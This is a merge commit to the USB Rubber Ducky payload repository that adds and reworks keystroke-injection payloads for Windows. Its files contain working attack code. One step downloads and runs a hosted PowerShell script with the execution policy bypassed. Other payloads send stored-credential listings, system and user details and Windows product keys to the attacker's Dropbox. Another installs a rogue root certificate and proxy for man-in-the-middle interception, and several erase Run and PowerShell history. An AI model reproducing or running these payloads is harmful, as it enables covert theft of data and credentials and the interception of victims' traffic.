Merge pull request #431 from PlumpyTurkey/master

New Payloads and Extensions
pull/462/head
Peaks 2024-06-26 16:45:10 -04:00 committed by GitHub
commit 1bdf62bc7e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
17 changed files with 671 additions and 227 deletions

View File

@ -0,0 +1,43 @@
EXTENSION POWERSHELL_TO_DROPBOX
REM_BLOCK DOCUMENTATION
Title: PowerShell To Dropbox
Author: PlumpyTurkey
Description: This extension allows you to exfiltrate content available from PowerShell to a file in your Dropbox.
Target: Windows 10, 11
Version: 1.1
END_REM
REM Required options:
DEFINE #PTD_CONTENT $Content
DEFINE #PTD_REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
DEFINE #PTD_APP_KEY XXXXXXXXXXXXXXX
DEFINE #PTD_APP_SECRET XXXXXXXXXXXXXXX
REM Advanced options:
DEFINE #PTD_OUTPUT_FOLDER Exfiltrated-content
DEFINE #PTD_OUTPUT_FILE [${env:COMPUTERNAME}-${env:USERNAME}].txt
FUNCTION PTD_SEND()
STRING_POWERSHELL
try {
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token";
"refresh_token" = "#PTD_REFRESH_TOKEN";
"client_id" = "#PTD_APP_KEY";
"client_secret" = "#PTD_APP_SECRET"
}
).access_token)";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = "{""path"":""/#PTD_OUTPUT_FOLDER/#PTD_OUTPUT_FILE"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body #PTD_CONTENT | Out-Null
}
catch {
Write-Host "An error occurred: $_"
}
END_STRING
END_FUNCTION
END_EXTENSION

View File

@ -1,25 +0,0 @@
EXTENSION PowerShell_To_Dropbox
REM Title: PowerShell_To_Dropbox
REM Author: Who-Is-Julien
REM Description: This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
REM Target: Windows 10, 11
REM For usage instructions look at https://github.com/Who-Is-Julien/Ducky-Utilities/blob/main/PowerShell_To_Dropbox/README.md
DEFINE REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
DEFINE APP_KEY XXXXXXXXXXXXXXX
DEFINE APP_SECRET XXXXXXXXXXXXXXX
STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "
STRING REFRESH_TOKEN
STRING "; client_id = "
STRING APP_KEY
STRING "; client_secret = "
STRING APP_SECRET
STRING "}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body $report | Out-Null
DELAY 500
ENTER
END_EXTENSION

View File

@ -0,0 +1,34 @@
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION

View File

@ -0,0 +1,59 @@
# Windows Duck In The Middle
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt">
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a>
<a href="#">
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
</a>
</p>
This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). After executing your payload, the proxy server will intercept all the target user's network traffic.
## Process
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Creates a new virtual desktop.
3. Opens a PowerShell window using the Windows+X menu.
4. Runs PowerShell code that performs the following actions:
- Downloads your certificate to a temporary file.
- *Configures Firefox to accepts root user certificates for each profile.*
- Configures and activates the proxy for the current user.
- Deletes the temporary certificate file and PowerShell history, then closes the window.
5. Confirms the addition of a trusted certificate in the confirmation dialog box.
6. Closes the virtual desktop.
7. *Disables USB Rubber Ducky*
> [!NOTE]
> No configuration is required for Chromium-based browsers since they accept user root certificates by default.
## Prerequisites
To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com/). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org/) or [Burp Suite](https://portswigger.net/burp).
> [!WARNING]
> To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy.
## Options
|Required options|Data type|Default value|Description|
|-|-|-|-|
|CERT_URL|String|example.com|The download link for your Trusted Root CA certificate|
|PROXY_IP|String|127.0.0.1|Your proxy's IP address|
|PROXY_PORT|Integer|8080|Your proxy port|
|Advanced options|Data type|Default value|Description|
|-|-|-|-|
|SHORT_DELAY|Integer|500|Short delay time|
|MEDIUM_DELAY|Integer|2000|Medium delay time|
|LONG_DELAY|Integer|4000|Long delay time|
|CONFIGURE_FIREFOX|Boolean|TRUE|Configures Firefox to accepts root user certificates for each profile|
|DISABLE_AFTER_EXECUTION|Boolean|TRUE|Disables USB Rubber Ducky after payload execution|
## Contributors
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

View File

@ -0,0 +1,136 @@
REM_BLOCK DOCUMENTATION
Title: Windows Duck In The Middle
Author: PlumpyTurkey
Description: This payload sets up a trustworthy proxy for the user, enabling a Man-in-the-middle attack.
Target: Windows 10, 11
Version: 1.0
Category: Execution
END_REM
REM Required options:
DEFINE #CERT_URL example.com
DEFINE #PROXY_IP 127.0.0.1
DEFINE #PROXY_PORT 8080
REM Advanced options:
DEFINE #SHORT_DELAY 500
DEFINE #MEDIUM_DELAY 2000
DEFINE #LONG_DELAY 4000
DEFINE #CONFIGURE_FIREFOX TRUE
DEFINE #DISABLE_AFTER_EXECUTION TRUE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION WINDOWS_ONLY
REM VERSION 1.0
REM AUTHOR: Korben
DEFINE #FAILURE_LED TRUE
DEFINE #FAILURE_LED_MODE LED_R
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
IF (($_OS == WINDOWS) == FALSE) THEN
IF_DEFINED_TRUE #FAILURE_LED
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
END_IF_DEFINED
#FAILURE_ATTACKMODE
STOP_PAYLOAD
END_IF
END_EXTENSION
CTRL GUI d
GUI x
DELAY #SHORT_DELAY
STRING i
DELAY #MEDIUM_DELAY
STRING_POWERSHELL
Clear-Host;
$c = New-TemporaryFile;
try {
Invoke-WebRequest -UseBasicParsing -Uri "#CERT_URL" -OutFile $c;
Import-Certificate -FilePath $c -CertStoreLocation "Cert:\CurrentUser\Root";
END_STRING
IF_DEFINED_TRUE #CONFIGURE_FIREFOX
STRING_POWERSHELL
if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles") {
Get-ChildItem -Path "$env:APPDATA\Mozilla\Firefox\Profiles" -Filter "prefs.js" -Recurse | ForEach-Object {
(Get-Content $_.FullName) -replace '"security.enterprise_roots.enabled", false','"security.enterprise_roots.enabled", true' | Set-Content $_.FullName
}
};
END_STRING
END_IF_DEFINED
STRING_POWERSHELL
@{ "ProxyServer" = "#PROXY_IP:#PROXY_PORT"; "ProxyEnable" = "1" }.GetEnumerator() | ForEach-Object {
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name $_.Name -Value $_.Value
}
}
finally {
Remove-Item $c;
Remove-Item (Get-PSReadLineOption).HistorySavePath;
exit
}
END_STRING
ENTER
DELAY #LONG_DELAY
ALT TAB
DELAY #SHORT_DELAY
TAB
ENTER
CTRL GUI F4
IF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED

View File

@ -1,19 +0,0 @@
- **Configure your Dropbox application**
- Create a Dropbox account.
- [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
- Go to the settings of this app and write down your "App key" and "App secret".
*These are your "<APP_KEY>" and "<APP_SECRET>".*
- Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
- After that, open this link in your browser *(values between brackets must be changed)*.
```
https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
```
- Connect your application, allow its permissions, and note the code it gives you.
*This is your "<APP_CODE>".*
- Open a command prompt and run this command *(values between brackets must be changed)*.
```
curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
```
- Note the "refresh_token" value of the result.
*This is your "<REFRESH_TOKEN>".*

View File

@ -1,48 +1,48 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Privilege+Excalibur+🪟🗡️">
</a>
</h1>
## Windows Privilege Excalibur
## Description
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a>
<a href="#">
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
</a>
</p>
This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
This payload sends you a brief user privilege escalation report via Dropbox. Once you have the report, you can perform further privilege escalation analysis, including using the following resources:
*The setup needs to be done only once for the payload to work forever.*
|Report Category|Useful Resources|
|-|-|
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|Stored Credentials||
|Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
## Setup
## Process
> If you already have your <APP_KEY>, <APP_SECRET> and <REFRESH_TOKEN>, you can go directly to the "Prepare your payload" step.
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
3. Executes a hosted PowerShell script that performs the following actions:
- Clears the history of the Windows Run menu.
- Prepares a report on target PC user privilege escalation.
- Sends the report to a file in your Dropbox.
- **Configure your Dropbox application**
## Prerequisites
- Follow the instructions in "[DROPBOXSETUP.md](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/DROPBOXSETUP.md)".
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
- **Prepare your payload**
> [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
- Download the Powershell script "script.ps1".
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
- Upload your modified "script.ps1" file to Dropbox and copy the upload link.
- Replace the end of the link from "?dl=0" to "?dl=1"
*This is your "<DOWNLOAD_LINK>".*
- Download the "payload.txt" file.
- Edit it to include your <DOWNLOAD_LINK>.
## Options
## Analysis
|Required extension options|Extension|Data type|Default value|Description|
|-|-|-|-|-|
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
Once you have your report file, you can use the following resources to help you find ways to escalate your privileges:
## Contributors
| Report Category | Useful Resources |
| --- | --- |
| System Information | [WES-NG](https://github.com/bitsadmin/wesng) |
| User Information | [Priv2Admin](https://github.com/gtworek/Priv2Admin) |
| Stored Credentials | |
| Installed Programs | [Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com) |
#### Coming soon...
- [ ] Windows Services Misconfigurations
---
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

View File

@ -1,17 +1,107 @@
REM Title: Windows Privilege Excalibur
REM Author: Who-Is-Julien
REM Description: This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis.
REM Target: Windows 10, 11
REM_BLOCK DOCUMENTATION
Title: Windows Privilege Excalibur
Author: PlumpyTurkey
Description: This payload sends you a brief user privilege escalation report via Dropbox.
Target: Windows 10, 11
Version: 1.3
Category: Exfiltration
END_REM
REM Replace DOWNLOAD_LINK with the actual download link of the script.
DEFINE DOWNLOAD_LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
STRING DOWNLOAD_LINK
STRING ; iex $pl
DELAY 500
ENTER
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION WINDOWS_ONLY
REM VERSION 1.0
REM AUTHOR: Korben
DEFINE #FAILURE_LED TRUE
DEFINE #FAILURE_LED_MODE LED_R
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
IF (($_OS == WINDOWS) == FALSE) THEN
IF_DEFINED_TRUE #FAILURE_LED
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
END_IF_DEFINED
#FAILURE_ATTACKMODE
STOP_PAYLOAD
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION

View File

@ -1,6 +1,49 @@
#Replace <APP_KEY> with the actual "App Key" of your app.
#Replace <APP_SECRET> with the actual "App Secret" of your app.
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
$APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token";
"refresh_token" = $RefreshToken;
"client_id" = $AppKey;
"client_secret" = $AppSecret
}
).access_token)";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
catch {
Write-Host "An error occurred: $_"
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Stored Credentials #`n $(CMDKEY /LIST | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
$Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET

View File

@ -1,49 +0,0 @@
#Replace <APP_KEY> with the actual "App Key" of your app.
#Replace <APP_SECRET> with the actual "App Secret" of your app.
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
#Clear windows run dialog history
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
#Define the headers required for the access token request
$headers = @{
"Content-Type" = "application/x-www-form-urlencoded"
}
#Define the parameters for the access token request
$body = @{
grant_type = "refresh_token"
refresh_token = "<REFRESH_TOKEN>"
client_id = "<APP_KEY>"
client_secret = "<APP_SECRET>"
}
#Request an access token from Dropbox using the body and headers defined above
$access_token_response = Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers $headers -Body $body
$access_token = $access_token_response.access_token
#Define headers for the file upload
$headers = @{
"Authorization" = "Bearer $access_token"
"Content-Type" = "application/octet-stream"
"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
}
#Define the report for the file upload
$body = "# System Information #`n $(SYSTEMINFO | Out-String)"
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
$body += "`n# Stored Credentials #`n $(CMDKEY /LIST | Out-String)"
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
#Upload the report to Dropbox using the headers and body defined above
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -Body $body | Out-Null

View File

@ -1,34 +0,0 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
</a>
</h1>
## Description
This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
## Usage
### Setup
- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
```
python -m http.server 80
```
- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
```
http://<REMOTE_IP_ADDRESS>/script.ps1
```
### Analysis
Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
---
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*

View File

@ -1,17 +0,0 @@
REM Title: Windows Product Duckey
REM Author: Who-Is-Julien
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
REM Target: Windows 10, 11
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
STRING REMOTE_IP_ADDRESS
STRING /script.ps1; iex $pl
DELAY 500
ENTER

View File

@ -1,4 +0,0 @@
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null

View File

@ -1,8 +0,0 @@
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
#Clear windows run dialog history
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
#Retrieve and send the computer's original product key to a remote server
Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null

View File

@ -0,0 +1,41 @@
# Windows Product Key Grabber
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a>
<a href="#">
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
</a>
</p>
This payload sends you the target PC's Windows product key via Dropbox.
## Process
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
3. Executes a hosted PowerShell script that performs the following actions:
- Clears the history of the Windows Run menu.
- Recovers Windows product key from target PC.
- Sends the Windows product key of the target PC to a file in your Dropbox.
## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options
|Required extension options|Extension|Data type|Default value|Description|
|-|-|-|-|-|
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
## Contributors
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

View File

@ -0,0 +1,107 @@
REM_BLOCK DOCUMENTATION
Title: Windows Product Key Grabber
Author: PlumpyTurkey
Description: This payload sends you the target PC's Windows product key via Dropbox.
Target: Windows 10, 11
Version: 1.0
Category: Exfiltration
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION WINDOWS_ONLY
REM VERSION 1.0
REM AUTHOR: Korben
DEFINE #FAILURE_LED TRUE
DEFINE #FAILURE_LED_MODE LED_R
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
IF (($_OS == WINDOWS) == FALSE) THEN
IF_DEFINED_TRUE #FAILURE_LED
